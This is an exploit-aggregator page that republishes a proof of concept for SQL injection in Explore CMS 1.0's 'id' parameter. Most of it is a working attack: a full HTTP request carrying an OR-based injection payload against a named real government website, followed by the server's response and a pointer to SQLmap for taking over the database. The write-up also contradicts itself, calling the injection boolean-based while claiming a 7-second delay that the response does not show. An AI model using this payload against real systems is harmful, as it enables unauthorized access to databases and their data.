Advertisement






Explore CMS 1.0 SQL Injection

CVE Category Price Severity
CVE-2021-43787 CWE-89 $1,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040048

Below is a copy:

Explore CMS 1.0 SQL Injection
# Exploit Title: explore CMS  - Boolean Based SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: On Request
# POC


#SQL Injection
SQL injection is a web security vulnerability that allows an attacker
to interfere with the queries that an application makes to its
database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of
the 'page' page.


#Steps to reproduce

Following URL is vulnerable to SQL Injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: www.gdc.gov.bd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: https://www.gdc.gov.bd/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36


HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB


Server accepts the payload and the response get delayed by 7 seconds.

#Impact

An attcker can compromise the database of the application by manual
method or by automated tools such as SQLmap.

-- 
Thanks
Sajibe Kanti

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.